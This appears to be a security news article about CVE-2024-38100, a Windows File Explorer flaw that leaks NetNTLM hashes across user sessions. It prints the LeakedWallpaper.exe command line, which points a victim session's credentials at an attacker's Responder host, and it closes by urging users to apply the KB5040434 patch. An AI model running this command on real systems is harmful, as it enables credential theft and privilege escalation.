Saturday, September 7, 2024
HomeCVE/vulnerabilityLeaked Wallpaper Vulnerability Exposes Windows Users to Privilege Escalation Attacks

Leaked Wallpaper Vulnerability Exposes Windows Users to Privilege Escalation Attacks

Published on

A newly discovered vulnerability in Windows File Explorer has raised alarms within the cybersecurity community.

Identified as CVE-2024-38100, this security flaw allows attackers to escalate privileges by exploiting a seemingly innocuous wallpaper feature.

CVE-2024-38100 – Windows File Explorer Elevation of Privilege Vulnerability

Released on July 9, 2024, CVE-2024-38100 is a critical vulnerability that Microsoft has classified as an “Important” security issue.

- Advertisement - EHA

The flaw, tracked under CWE-284 for Improper Access Control, carries a CVSS score of 7.8/6.8, indicating a significant risk to affected systems.

The Exploit

The vulnerability centers around the ability to leak a user’s NetNTLM hash from any session on the computer, even from a low-privileged user account.

The exploit tool, named “LeakedWallpaper.exe,” can be executed with the following command:

.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg

For example:

.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg

This command targets a specific session ID, allowing an attacker to capture the NetNTLM hash of a privileged account, such as an administrator, from a low-privileged session.

The attacker operates from a low-privileged account (“exploit”) and targets a privileged account (“administrator”) to obtain its NetNTLM hash.

The attacker’s machine (Responder IP: 172.16.0.5) communicates with the victim’s machine (Windows IP: 172.16.0.2) to execute the exploit.

Microsoft has addressed this vulnerability in the KB5040434 update. Users and administrators are strongly advised to apply this update immediately to protect their systems from potential attacks.

CVE-2024-38100 underscores the importance of continuous vigilance and timely updates in maintaining cybersecurity.

As attackers find innovative ways to exploit even the most mundane features, users must stay informed and proactive in safeguarding their digital environments.

For more information on this vulnerability and its mitigation, visit the official Microsoft security advisory page. 

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...

NoiseAttack is a Novel Backdoor That Uses Power Spectral Density For Evasion

NoiseAttack is a new method of secretly attacking deep learning models. It uses triggers...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...